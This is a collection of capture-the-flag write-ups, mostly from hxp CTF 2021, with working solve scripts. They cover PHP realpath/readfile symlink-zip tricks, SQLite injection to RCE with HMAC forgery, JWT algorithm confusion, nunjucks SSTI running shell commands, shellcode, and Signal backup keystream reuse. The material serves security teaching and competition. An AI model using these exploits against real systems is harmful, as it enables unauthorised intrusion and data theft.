```root@229a6d68a68b:/var/www/html/data/ccf86389404367cb06bab3ba41c71c27# psyshPsy Shell v0.11.0 (PHP 7.4.25 _ cli) by Justin Hileman>>> realpath('file:///var/www/html/data/ccf86389404367cb06bab3ba41c71c27/leak.lnk');=> "/var/www/html/data/ccf86389404367cb06bab3ba41c71c27/file:/var/www/html/data/ccf86389404367cb06bab3ba41c71c27/leak.lnk">>> readfile('file:///var/www/html/data/ccf86389404367cb06bab3ba41c71c27/leak.lnk');hxp{fleg}=> 10```
Notice that `realpath()` does the following translation```file:///var/www/html/data/ccf86389404367cb06bab3ba41c71c27/leak.lnkfile:/var/www/html/data/ccf86389404367cb06bab3ba41c71c27/leak.lnk```which it interprets as a relative file path. Notice that this `leak.lnk` is not a symlink to `/flag.txt`, but actually just an empty directory.
The actual symlink to `/flag.txt` is located in `/var/www/html/data/ccf86389404367cb06bab3ba41c71c27/leak.lnk`, which `readfile()` will read.
Props to Youssef for coming up with this solution!
```pythonimport requestsimport os
url = "http://65.108.176.76:8200"
s = requests.Session()res = s.get(url)sess_id = s.cookies["PHPSESSID"]print(f"[+] PHPSESSID = {sess_id}")
res = s.get(f"{url}/?file=/var/lib/php/sessions/sess_{sess_id}")sandbox = res.text.split(":")[-1].split(";")[0][1:-1]print(f"[+] sandbox = {sandbox}")
symlink = "leak.lnk"file_url = f"file:///var/www/html/data/{sandbox}/{symlink}"
os.system("rm -rf leak.lnk go.zip file:")os.system(f"ln -s /flag.txt leak.lnk")os.system(f"mkdir -p {file_url}")os.system(f"zip --symlinks -r go.zip file: {symlink}")
files = {"file": open("go.zip", "rb")}res = s.post(f"{url}", files=files)res = s.get(f"{url}/?file={file_url}")print(res.text)```
```$ python3 solve.py[+] PHPSESSID = 10a5nlegdvdl0o99a6e5khkedm[+] sandbox = a8a188a8460b7a11b7bbad7f2a8562c6 adding: file:/ (stored 0%) adding: file:/var/ (stored 0%) adding: file:/var/www/ (stored 0%) adding: file:/var/www/html/ (stored 0%) adding: file:/var/www/html/data/ (stored 0%) adding: file:/var/www/html/data/a8a188a8460b7a11b7bbad7f2a8562c6/ (stored 0%) adding: file:/var/www/html/data/a8a188a8460b7a11b7bbad7f2a8562c6/leak.lnk/ (stored 0%) adding: leak.lnk (stored 0%)hxp{at_least_we_have_all_the_performance_in_the_world..._lolphp_:/}```
## Note
The challenge set `php_admin_value[allow_url_fopen] = 0`. However, this stilllets use use PHP's various [streamwrappers](https://www.php.net/manual/en/wrappers.php). Notice `file://` is notrestricted by `allow_url_fopen`, as indicated here:https://www.php.net/manual/en/wrappers.file.php
You can also see this in the [source code](https://github.com/php/php-src/blob/PHP-7.4.25/main/streams/streams.c#L1865), where `plain_files_wrapper->is_url == 0`. |
# Obscure Old Register
We get a hint on a Talon register: https://m.media-amazon.com/images/I/81qEQFUgFmL._AC_SS350_.jpg
Given the picture above, and the challenge input:```7-1 4-1 4-2 8-1 1 1 1 9 1 8-1 7-1 10 5-2 1 1 1 2 7-1 5-2 1 1 1 5-1 8-2 1 5-2 14 1 1 1 7-2 16-1 14 15 1 1 1 15 11 1 1 1 9 1 8-1 4-2 1 1 1 18-1 11 16-1 1 1 1 16-1 14 4-2 1 1 1 1 1 1 1 14 3 13 7-1 12-1 15 1 1 1 11 13 1 1 1 2 4-2 1 1 1 1 10 10 11 18-1 4-2 4-1 1 1 1 1 15 1 1 1 9 4-2 1 1 1 4-2 6 4-2 6 4-2 6 1 1 1 17-1 11 17-1 1 1 1 9 1 8-1 7-1 10 5-2 1 1 1 2 7-1 5-2 1 1 1 14 15 13 7-1 10 5-2 14 1 1 1 13 4-2 1 8-2 8-2 18-1 1 1 1 7-1 14 1 1 1 1 1 1 1 2 16-1 9 9 4-2 13 1 1 1 2 16-1 15 1 1 1 11 6 1 1 1 17-1 4-2 8-2 8-2 1 1 1 7-1 1 1 1 5-2 16-1 4-2 14 14 1 1 1```
We have the first number going from 1 to 18, and the second being either absent, 1, or 2.We can then match the first number being the "row" on the register, and the second number being the letter "offset" on that row (or the letter itself when absent).
```python tallon.py
IDEKAAAMAKINGAAABIGAAAFLAGSAAAJUSTAAATOAAAMAKEAAAYOUAAAUSEAAAAAAASCRIPTAAAORAAABEAAAANNOYEDAAAATAAAMEAAAEHEHEHAAAWOWAAAMAKINGAAABIGAAASTRINGSAAAREALLYAAAISAAAAAAABUMMERAAABUTAAAOHAAAWELLAAAIAAAGUESSAAA``` |
shitty blog ?=====
Points: 250 (31 solves)
Writeup by: ath0 and qxxxb
Challenge Author: 0xbb
Files: `shitty blog ?-a6c0b8b672817005.tar.xz`
Overview=====
The main logic of the challenges resides in one file, `index.php`.
There is a per-session SQLite database that gets created at`'/var/www/html/data/' . md5($salt.'|'.$id.'|'.$mac);`. In the session cookie,there is a user id (`$id`) and a HMAC which will be verified:
```php $session = explode('|', $_COOKIE['session']); if( ! hash_equals(crypt(hash_hmac('md5', $session[0], $secret, true), $salt), $salt.$session[1])) { exit(); } $id = $session[0]; $mac = $session[1];```
If we can forge a valid HMAC, we can move forward with a totally controlled `$id` (more on the forgery later).
qxxxb noticed some interesting bits in the nginx config:
``` nginxlocation / { try_files $uri $uri/ =404;}```
We can visit `http://localhost:8888/data/<sandbox_url>/blog.sqlite3` and we'll beable to read our sqlite database back. But this doesn't help us achive ourultimate goal: We need to execute `/readflag` (neither nginx nor php have theability to read `flag.txt` directly), so we need RCE. The other thing to noteis nginx is setup to send any file ending in `.php` through the php interpreter:
```nginxlocation ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php7.4-fpm.sock;}```
So if we can write a `.php` file somewhere in `/var/www/html/`, we can justvisit that URL and it will get executed! But how can we create such a file?
Luckily, there's another vulnerability which is likely the first thing you'll notice when scanning `index.php`:
```phpfunction delete_entry($db, $entry_id, $user_id) { $db->exec("DELETE from entry WHERE {$user_id} <> 0 AND id = {$entry_id}");}```
SQL injection on `$user_id`! So if we can cram a SQL injection payload into`$user_id`, we can use any of the capabilities of SQLite.
Exploit=====
SQL injection to RCE----
Assuming we can control the user id (requires HMAC forgery, below), how will weget code execution?
Some [cheat sheet](https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet) I found online shows you can create SQLite databases with arbitrary names:
```1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('hax'); --```
And nginx is setup to send any file ending in .php through the php interpreter:
```nginxlocation ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php7.4-fpm.sock;}```
So our SQL injection payload just needs to create a file at `/var/www/html/data/lol-abcdefg.php` containing `` anywhere within the file.
So the SQL injection payload we need (with quotes correctly encoded) is:
```'; ATTACH DATABASE '/var/www/html/data/lol-abcdefg.php' AS lol; CREATE TABLE lol.pwn (dataz test); INSERT INTO lol.pwn (dataz) VALUES (''); --```
(the `--` at the end starts a comment)
Forging a HMAC=====
Here is the relevant code from the `index.php`:
```php# Generating an HMAC$mac = substr(crypt(hash_hmac('md5', $id, $secret, true), $salt), 20);
# Verifying an HMACif( ! hash_equals(crypt(hash_hmac('md5', $session[0], $secret, true), $salt), $salt.$session[1])) { exit();}```
The fourth `true` argument to `hash_hmac()` is for the parameter `binary`:> When set to true, outputs raw binary data. false outputs lowercase hexits.
However, the documentation for `crypt()` shows:> **Warning**: This function is not (yet) binary safe!
It turns out that `crypt()` considers its inputs as null-terminated strings. Asshown[here](https://www.reddit.com/r/PHP/comments/t0qzl/is_this_a_bug_shouldnt_crypt_be_binary_safe/),everything after the null byte is ignored:```php>>> assert( crypt(b"\x00stuff", '$6$89bc41658a01fb6b$') == crypt(b"\x00ignored", '$6$89bc41658a01fb6b$'))=> true```
The first step is to find a `$mac` where`hash_hmac('md5', $id, $secret, true)` starts with a null byte.
The probability of this happening for a random `$id` is `1 / 256`. If ithappens twice, we'll get two identical `$mac` values. Here's code to retrieve the null MAC:
```pythondef get_null_mac(): mac_counter = set() for i in tqdm(itertools.count()): res = requests.get(URL_BASE) id, mac = urllib.parse.unquote(res.cookies["session"]).split("|") if mac in mac_counter: return mac mac_counter.add(mac)
raise ValueError("Unreachable")```
Now that we have the null MAC, we can append junk at the end of our SQLipayload inside a comment and until its MAC matches our null MAC (`1 / 256`chance):
```pythondef attempt_sqli(junk: str, null_mac: str): payload = ( "'test'; ATTACH DATABASE '/var/www/html/data/lol-abcdefg.php' AS lol; CREATE TABLE lol.pwn (dataz test); INSERT INTO lol.pwn (dataz) VALUES (''); -- " + junk ) # ...```
Full solve script in `solve.py`.
```$ python3 solve.py[*] Looking for null MAC ...207it [01:15, 2.73it/s][+] null_mac = yC8z7vD9vdpSERKREHFfJ/PpyNg9yAXh00wZHnh8AlIehpWVmVxzrjphnbjrpiCr6Umu9D2l.CUSzAIlqQjLR/[*] Attempting SQLi ...post_id = 1hxp{dynamically_typed_statically_typed_php_c_I_hate_you_all_equally__at_least_its_not_node_lol_:(}
37it [00:15, 2.44it/s]``` |
# caBalS puking (hxp CTF 2021)
Challenge description:
```Hey, did you hear the good news? We were finally able to get ADB access to kirschju’s phone. All we could find on the file system were two Signal backup files, though. Nevertheless, with hxp’s ever-delayed challenge development process, there is hope that we might find a flag in the backup.
The first backup coincides closely with the registration time of the target Signal account, so we believe it represents the state of an empty account. The second backup file is a lot larger, for sure there’s some valuable piece of information in there.
We’re also attaching the Signal app retrieved from the phone for your reference, but it doesn’t seem to be modified compared to a vanilla app.```
* Category: misc, crypto* Points: 667 points (6 solves)* Author: `kirschju`
Given files: `Signal.apk`, `signal-2021-11-29-22-02-26.backup`, `signal-2021-11-30-00-18-47.backup`
# Solution
We are given two backup files and the apk that created them.I started by searching for tools that can parse and decrypt the backup files:
* https://github.com/bepaald/signalbackup-tools (cpp)* https://github.com/SoftwareArtisan/signal-backup-exporter (python :))
Both seem to request 30 digit passphrase to decrypt the db.The tools seem to read iv and salt from the backup header. I used `signalbackup-tools` on both files to check their properties:
```bash$ ./signalbackup-tools signal-2021-11-29-22-02-26.backup 000000000000000000000000000000signalbackup-tools (./signalbackup-tools) source version 20211109.080912 (OpenSSL)IV: (hex:) 87 16 6a b8 af 3c 58 62 9f f5 c5 eb 5b 47 1e bc (size: 16)SALT: (hex:) 0e 66 21 b2 8a 61 8a 65 28 93 e8 42 99 b8 fc 82 04 e8 0f 0a 3a 00 d6 12 c3 1a 8c b8 90 f9 f8 e9 (size: 32)BACKUPKEY: (hex:) f3 1d 9f 1e c4 58 ac a7 d9 b2 66 00 2f d7 2f 27 fd ca 24 58 06 7e 6b 17 dd 5e f6 8e 47 e4 d6 62 (size: 32)CIPHERKEY: (hex:) d1 45 0b aa 07 81 e9 84 1d e9 3d 28 81 c1 63 e5 41 e5 46 30 43 6c 58 5d 4b 6e 2f b1 7c c2 89 69 (size: 32)MACKEY: (hex:) 24 aa d0 9b 42 68 28 bc cb a8 08 50 af 39 93 fc 36 3a a8 47 d4 96 e6 09 58 89 d6 82 d3 0d ed b0 (size: 32)COUNTER: 2266393272Reading backup file...FRAME 0 (000.0%)... WARNING: Bad MAC in frame: theirMac: (hex:) ff ec 53 c8 58 a9 f6 64 1a 7a ourMac: (hex:) a9 cc c3 db d7 28 f3 0a 18 5d 0d de 42 89 9a 45 27 a8 13 28 31 57 ca e2 e4 37 1e 88 74 cc 0b 59...
$ ./signalbackup-tools signal-2021-11-30-00-18-47.backup 000000000000000000000000000000signalbackup-tools (./signalbackup-tools) source version 20211109.080912 (OpenSSL)IV: (hex:) 87 16 6a b8 af 3c 58 62 9f f5 c5 eb 5b 47 1e bc (size: 16)SALT: (hex:) 0e 66 21 b2 8a 61 8a 65 28 93 e8 42 99 b8 fc 82 04 e8 0f 0a 3a 00 d6 12 c3 1a 8c b8 90 f9 f8 e9 (size: 32)BACKUPKEY: (hex:) f3 1d 9f 1e c4 58 ac a7 d9 b2 66 00 2f d7 2f 27 fd ca 24 58 06 7e 6b 17 dd 5e f6 8e 47 e4 d6 62 (size: 32)CIPHERKEY: (hex:) d1 45 0b aa 07 81 e9 84 1d e9 3d 28 81 c1 63 e5 41 e5 46 30 43 6c 58 5d 4b 6e 2f b1 7c c2 89 69 (size: 32)MACKEY: (hex:) 24 aa d0 9b 42 68 28 bc cb a8 08 50 af 39 93 fc 36 3a a8 47 d4 96 e6 09 58 89 d6 82 d3 0d ed b0 (size: 32)COUNTER: 2266393272Reading backup file...FRAME 0 (000.0%)... WARNING: Bad MAC in frame: theirMac: (hex:) ff ec 53 c8 58 a9 f6 64 1a 7a ourMac: (hex:) a9 cc c3 db d7 28 f3 0a 18 5d 0d de 42 89 9a 45 27 a8 13 28 31 57 ca e2 e4 37 1e 88 74 cc 0b 59...```
The backup, cipher and mac keys are derived from the passphrase and the salt.
The data is split into separated frames.The encryption seems to be some variation of [AES-CTR](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Counter_(CTR)) on each frame of the data.Pseudo code:
```IV = <16 bytes value>for frame in data: IV[0:4] += 1 IV_TMP = IV for block in frame: enc_block = xor(block, aes(IV_TMP)) IV_TMP += 1```
The counter (4 most significant bytes of the iv) is incremented between each frame,And the whole iv is incremented between blocks.
As we've seen both of the backups share the same iv and salt (and probably the same passphrase),so by xoring each of their frames respectively we can get rid of the encrypted aes stream and get the xored plaintexts.Also, If we have the plaintext of one of them we can xor it with the encrypted data and retrieve the aes stream for each frame.
We know that one of the backups is for a new account! So we can create a new account and (hopefully) get a similar backup.I created a new account (using the provided apk) with the name `kirschju`, then created a backup of it.And saw it is nearly the same size of the empty backup provided:
```3764359 my.backup3764364 signal-2021-11-29-22-02-26.backup4118872 signal-2021-11-30-00-18-47.backup```
I modified the function `decrypt_frame` in the python tool, to store each decrypted frame raw data.
```pythondecrypted_frames = [] # ADDEDdef decrypt_frame(bfile, ofile, length, with_iv=False): b_crypto.update_iv_from_counter() b_crypto.bump_counter() mac = b_crypto.get_mac()
aes_cipher = b_crypto.aes_cipher enc_iv = b_crypto.iv if with_iv: mac.update(b_crypto.iv)
def get_chunk(): # Read as many 16 byte chunks as possible for i in range(int(length / 16)): yield bfile.read(16) # Read remainder yield bfile.read(length % 16)
decrypted_frame = b'' # ADDED for enc_chunk in get_chunk(): mac.update(enc_chunk) output = strxor.strxor( enc_chunk, aes_cipher.encrypt(enc_iv)[:len(enc_chunk)] ) decrypted_frame += output # ADDED ctr = int.from_bytes(enc_iv, byteorder='big') + 1 enc_iv = int.to_bytes(ctr, length=16, byteorder='big') ofile.write(output) decrypted_frames.append(output) # ADDED
our_mac = mac.digest() our_mac = our_mac[:10] # trim to 1st 10 bytes their_asset_mac = bfile.read(10)
assert hmac.compare_digest(our_mac, their_asset_mac)```
I decrypted the empty backup and stored the decrypted_frames list into a file.
I wanted to extract the encrypted frames from the encrypted backups.
Each frame begins with four bytes size, and the encrypted data afterwards.After the frame data is decrypted it is parsed (using protobuf) to determine its kind, and if its an avatar/sticker/attachment its content are read from the backup as another frame. The problem is that, the size of the content are determined based on the decrypted "metadata" frame.
Note that the last 10 bytes of each frame are the calculated [MAC](https://en.wikipedia.org/wiki/Message_authentication_code) (message authentication code) of that frame, which we can ignore.
However, the frame size is usually less than 65536 bytes, so regular frames begins with \x00\x00.That way we can extract frames that starts with \x00\x00, and when encountering avatar/sticker/attachment content we can guess its size by searching for the next frame.
```pythondef get_frame(data: bytes): if data.startswith(b'\x00\x00'): size = int.from_bytes(data[:4], 'big') + 4 return size, data[4:size-10] else: size = data.find(b'\x00\x00') # making sure its not a random \x00\x00 while size + 4 + int.from_bytes(data[size:size+4], 'big') != data.find(b'\x00\x00', size+4): size = data.find(b'\x00\x00', size+4) return size, data[:size-10]
def extract_frames(backup_data: bytes): frames = [] while backup_data: size, block = get_frame(backup_data) backup_data = backup_data[size:] frames.append(block) return frames[1:] # return frames (without the header) ```
I extracted both backups encrypted frames, and compared the empty backup frame sizes with the frames from my phone.At the beginning the sizes seems identical but at some point it becomes totally different.It looks like the frames are ordered differently in the two backups. so we can't xor the frames by order to get the aes stream for each frame.
Also, some data (for example the registered phone number) is different, so specific parts may differ between the empty backups (hopefully it won't matter :)).
I decided to iterate over all reasonable combinations (based on the frames sizes).
```pythonfrom pathlib import Path
def xor(a, b): return bytes(aa ^ bb for aa, bb in zip(a, b))
# previously generated using signal-backup-exportermy_backup_decrypted_frames = eval(Path('my_backup_frames').read_text())empty_encrypted_frames = extract_frames(Path('signal-2021-11-29-22-02-26.backup').read_bytes())full_encrypted_frames = extract_frames(Path('signal-2021-11-30-00-18-47.backup').read_bytes())
print(len(my_backup_decrypted_frames), 'frames in my empty backup!')print(len(empty_encrypted_frames), 'frames in encrypted empty backup!')print(len(full_encrypted_frames), 'frames in encrypted full backup!')
# remove unrecoverable frames from full backupfull_encrypted_frames = full_encrypted_frames[:len(empty_encrypted_frames)]
# generate possibles aes streamsaes_streams = {}for i, enc_frame in enumerate(empty_encrypted_frames): aes_streams[i] = [] for dec_frame in my_backup_decrypted_frames: if abs(len(enc_frame) - len(dec_frame)) < 20: aes_streams[i].append(xor(enc_frame, dec_frame))
# decrypt each frame with all the streams found for itdecrypted = b''for i, enc_frame in enumerate(full_encrypted_frames): for aes_stream in aes_streams[i]: decrypted += xor(enc_frame, aes_stream)
Path('decrypted_chunks').write_bytes(decrypted)print('Done!')```
```bash$ python3 decrypt_backup.py 326 frames in my empty backup!326 frames in encrypted empty backup!356 frames in encrypted full backup!Done!```
Searching for the flag
```bash$ strings decrypted_chunks | grep -i hxp -C 2$ strings decrypted_chunks | grep -i flag -C 2VINSERT INTO sms VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,??,?,?,?,?,?,?,?,?,?,?,?)I can haz flag?$dc9d94b0-6282-438>-aga9!4k9=7db8a942VINSERT INTO sms VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?--VINSERT INTO sms VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,??,?,?,?,?,?,?,?,?,?,?,?)I can haz flag?B=#i7NYOXkK--...
```
The message "I can haz flag?" is inserted into the db.
Maybe the flag was sent in an attachment?
```bash$ binwalk decrypted_chunks
DECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------198168 0x30618 JPEG image data, JFIF standard 1.01294870 0x47FD6 JPEG image data, JFIF standard 1.01```
Extracting the images using `binwalk --dd=".*" decrypted_chunks`.When trying to open both images I receive an error related to the jpeg markers (probably few bytes got broken in the stream).
But the files indeed look like a valid JPEGs, I tried to open them online...And saw that the first image contains the flag!
Flag: `hxp{f0rmattin5+crypt0=<3}` |
Full writeup available at: [https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/slippy/](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/slippy/) |
Possibly longest writeup I've ever written ;^^ but it has pictures! [https://github.com/amelkiy/write-ups/tree/master/hxp-2021/baba_is_you](https://github.com/amelkiy/write-ups/tree/master/hxp-2021/baba_is_you) |
### Challenge ###
Not much to this one, the binary accepts shellcode and executes it.
```00400810 int32_t main(int32_t arg1, char** arg2, char** arg3)
00400821 setvbuf(fp: stdout, buf: nullptr, mode: 2, size: 0)00400836 setvbuf(fp: stdin, buf: nullptr, mode: 2, size: 0)0040083d drop_privs()00400849 puts(str: "Welcome to the Merry X-MAS code …")00400855 puts(str: "Note that this service is UNHACK…")00400861 puts(str: "Even if you SOMEHOW got a shell …")0040086d puts(str: "You still would not be able to g…")00400879 puts(str: "Because our Security Elves are 4…")00400885 puts(str: "And have dropped the priviledges…")00400898 __printf_chk(flag: 1, format: "Input your code here: ")004008a4 fflush(fp: stdout)004008c3 int64_t rax_2 = mmap(addr: nullptr, len: 0x1000, prot: 7, flags: 0x22, fd: 0xffffffff, offset: 0)004008d5 read(fd: 0, buf: rax_2, nbytes: 0x1000)004008ed __printf_chk(flag: 1, format: "Your code returned: %ld\n", rax_2())004008f9 puts(str: "Thank you for using our service!")00400901 return 0````
### Solution ###
Just used shellcraft.amd64.linux.cat shellcode to cat the flag from the users home directory.
```pythonfrom pwn import *
context.binary = elf = ELF("./chall")
p = remote("challs.xmas.htsp.ro", 2004)
p.recvuntil(b'Input your code here:')
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat("/home/ctf/flag.txt"))p.sendline(shellcode)
p.interactive()``` |
# Upgrades
## tl;dr
PowerPoint file that contains VBA macros with encrypted strings
## Analysing
We use olevba to spot and extract VBA macros from the PowerPoint:
We can see some string comparisons happening at the bottom, but it's between byte arrays that get passed through some "q" function:
## Decryption
Let's take a look at the q function:
This is pretty obviously a decrypt function, every byte goes through the same operation and then is turned into an actual character. The operation is the following:
```python decrypted = '' for byte in array: decrypted += chr((byte * 59 - 54) % 255) return decrypted```
So every byte is multiplied by 59, then gets 54 substituted from it, and then is modulo'd by 255 to fit in a byte. We can write a python script to decrypt all of these arrays:
```python# solve.py
enc_strings = [ [81, 107, 33, 120, 172, 85, 185, 33], [154, 254, 232, 3, 171, 171, 16, 29, 111, 228, 232, 245, 111, 89, 158, 219, 24, 210, 111, 171, 172, 219, 210, 46, 197, 76, 167, 233], [215, 11, 59, 120, 237, 146, 94, 236, 11, 250, 33, 198, 198], [59, 185, 46, 236, 33, 42, 33, 162, 223, 219, 162, 107, 250, 81, 94, 46, 159, 55, 172, 162, 223, 11] ]
def deobf(arr): de = '' for c in arr: de = de + chr((c * 59 - 54) & 255) return de
for arr in enc_strings: print(deobf(arr))
```
## Flag
And running the script:
 |
Main page shows a card and the login option in the lower right.
Clicking on the card shows us a list of naughty and nice. It seems no one was nice.
We can go to login and create a user:
However we only get a page stating that access is denied. Checking the cookie though, we can see it's a JWT token.
Putting it in https://jwt.io we can see it is using a RS256 algorithm with a public and private key to sign the token however the public key is in the data section.
According to the source code that was provided, the token can also be verified with HS256 algorithm which allows us to try a Confusion Attack.
I've followed the instructions on this page https://habr.com/en/post/450054/. This certainly could've been scripted or the jwt_tool could've been used but I was in a hurry and just followed my google search results. On the plus side, sometimes doing things manually allows for a better understanding and learning opportunity.
I've copied the public key and pasted it in sublime and used the regex to replace the \n with actual new lines.
So now we have it saved in a proper format as key.pem.
Now we can use the syntax below to turn it into ASCII hex and trim any other new lines I may have missed. Better safe than sorry.
```bashcat key.pem | xxd -p | tr -d "\\n"```
I've modified the algorithm and user to HS256 and admin respectively.
Now I copied the first two parts of the JWT (header and payload/red and purple) and ran the syntax below to supply the public key as ASCII hex to our signing operation.
```bashecho -n "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGsiOiItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF6VTFKendEZWhGTFFFRk0yam5EN1xuWDErUkRnUDZOb2x4WTE1MFg4NEo0TUp6ODZtbS9BRkFTRU9jM1ZFbG9SK2Vnb2NXclROenQ1RzBvVnFzZmovSFxuQXM1bWU0Y1V4S05Mek5YcWlOdCt3cy9wTW91ZTlaajVXSC9UcmVlL1MwRUR3eFBOM3JnOUlwR2xwQVN0Z01XY1xuZTB4UWNkQW05VCtvQUZLdVUxUW9sazQvWnZLc0pjU0lwb2xQU3l4dWVTckEya3lZUG83ZFgrVmsrcmIrRXNQUlxuaVI3ZHRyQ3JZMjdCUkE4VVRKc3ZZL3VKRzJBVEhGWFVyZ0doanFsck92blB0R3JxcEF2bFFwQjVqelN2SmpmaVxucWVuODNsNVRPUEZuSEV5VmxNam44blhGQUdPRnAwckVBajJkbXlwWVIyU2plWDBYTnNNbWpiV3UzTU8ySVVhaVxuOXdJREFRQUJcbi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLSIsImlhdCI6MTYzODczNDQ2M30"| openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b43415145416a6a536972772f64746b633761676950476751330a456734494762744e2f6268506c4c4d34504f5248336a72787a6274785846543537453257644f6539586f34564a55577448767959305439614362714d4e4b6b470a63365762344273337973746c79447a727137536d6f3946386d525130736d704a3771534b4e6f5a7449484a744f547a6a4d473536414c395a695a61326b3653430a306f61556b556c4d57745a685a346c5642565942552f434f344e64626770454b69444e4b497062314e4a5a76634457367a3273316c6e49666e417073564f48410a6a4b6c52542f634f2f424876413839616250644e473731513678375279765637616f794466395a4e4a2f3176417743426c436a713079723433386c7a4537494e0a647141585859795a7a2f356b556d574c505a456b637464352f597364694b392b727a635366776b744e71464c47616e6d646a71345476362b596b62544e7739530a67514944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d```
And we get our HMAC signature.
cf14cfe167a94210316c1b82fa221b4284a2096f830ec70f45f78777de17b796
Using python we can turn the HMAC signature from its current ASCII hex state to JWT format. Basically base64 encode it to be safe for url and take out the = in case one is there.
```bashpython -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('42890a49ab8265b03bf14acc5f9bdfb899a1b249a05fabc11fcc051330e98be5')).replace('=','')\")"```
zxTP4WepQhAxbBuC-iIbQoSiCW-DDscPRfeHd94Xt5Y
Now we just append that to our JWT token. This is the blue part of the token. The final token looks like this.
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGsiOiItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF6VTFKendEZWhGTFFFRk0yam5EN1xuWDErUkRnUDZOb2x4WTE1MFg4NEo0TUp6ODZtbS9BRkFTRU9jM1ZFbG9SK2Vnb2NXclROenQ1RzBvVnFzZmovSFxuQXM1bWU0Y1V4S05Mek5YcWlOdCt3cy9wTW91ZTlaajVXSC9UcmVlL1MwRUR3eFBOM3JnOUlwR2xwQVN0Z01XY1xuZTB4UWNkQW05VCtvQUZLdVUxUW9sazQvWnZLc0pjU0lwb2xQU3l4dWVTckEya3lZUG83ZFgrVmsrcmIrRXNQUlxuaVI3ZHRyQ3JZMjdCUkE4VVRKc3ZZL3VKRzJBVEhGWFVyZ0doanFsck92blB0R3JxcEF2bFFwQjVqelN2SmpmaVxucWVuODNsNVRPUEZuSEV5VmxNam44blhGQUdPRnAwckVBajJkbXlwWVIyU2plWDBYTnNNbWpiV3UzTU8ySVVhaVxuOXdJREFRQUJcbi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLSIsImlhdCI6MTYzODczNDQ2M30.zxTP4WepQhAxbBuC-iIbQoSiCW-DDscPRfeHd94Xt5Y
We put the token in the web browser of our choice and refresh the page. We can see we have access to the elf listing.
According to the source code, there is some nunjucks templating being used here.
We can try to confirm if we have SSTI (Server Side Template Injection) with a standard payload of {{7*7}}
We edit the elf name with that payload, refresh the main page where we have the nice vs naughty list and can see that indeed, it was interpreted and we have SSTI.
We google around for a bit regarding nunjucks SSTI and can find this article. http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine
We have nunjucks ssti and can read the flag by breaking out of the sandbox. We have command execution.
```bash{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}```
```bash{{range.constructor("return global.process.mainModule.require('child_process').execSync('ls -la /')")()}}```The font makes it more difficult to read so we can just CTRL+U to see the webpage source:
```bash{{range.constructor("return global.process.mainModule.require('child_process').execSync('cat /flag*')")()}}```
HTB{S4nt4_g0t_ninety9_pr0bl3ms_but_chr1stm4s_4in7_0n3} |
All operations occur in a sandboxed directory generated for each new session.
It has two important paths:
* If a file is uploaded, it will be unzipped in the sandboxed directory.* Otherwise, if a `file` GET parameter is provided, it performs the following: 1. Check if the word 'flag' is not in the path resolved by `realpath($_GET['file'])`. 2. If it passes, run `readfile($_GET['file'])`.
Note that a symbolic link is not possible to be used directly. From the [man page forrealpath](https://man7.org/linux/man-pages/man3/realpath.3.html):
``` realpath() expands all symbolic links and resolves references to /./, /../ and extra '/' characters in the null-terminated string named by path to produce a canonicalized absolute pathname. The resulting pathname is stored as a null-terminated string, up to a maximum of PATH_MAX bytes, in the buffer pointed to by resolved_path. The resulting path will have no symbolic link, /./ or /../ components.```
The problem here is that `realpath` and `readfile` contain an incongruence in the way they processthe path passed to it. [Protocol schemes and wrappers](https://www.php.net/manual/en/wrappers.php)can be specified in the input to `readfile` but `realpath` expects a strict unix path. Thus, we canuse this confusion in conjunction with our ability to create directories and files with the zip fileto force `realpath` into resolving a valid UNIX path but cause `readfile` to process a `php://` URI.
To execute `readfile("php://filter/convert.base64-encode/resource=exploit")`, we need the followingdirectory structure:
```php:/php:/filter/php:/filter/convert.base64-encode/php:/filter/convert.base64-encode/resource=exploit```
This allows us to read from the `exploit` file which can be a symlink to `/flag.txt`. Zipping upthis directory structure plus the symlink and triggering the file read path grants us the flag.
The exploit is as follows. This could probably have been simplified with the `file://` scheme butthis probably demonstrates the directory structure better.
```bash#!/bin/bash
rm -rf exploit.dirmkdir -p exploit.dirpushd exploit.dir
TARGET='http://65.108.176.76:8200'EPATH='php://filter/convert.base64-encode/resource=exploit'
mkdir -p $EPATHln -s /flag.txt exploitzip -y -r exploit.zip *
curl -H 'Cookie: PHPSESSID=e0pabhfs43a7i8q3plo0ghs6i8' $TARGET -F "[email protected]"curl -s -H 'Cookie: PHPSESSID=e0pabhfs43a7i8q3plo0ghs6i8' "$TARGET/?file=$EPATH" | base64 -d
echopopd```
Running the exploit to get the flag:
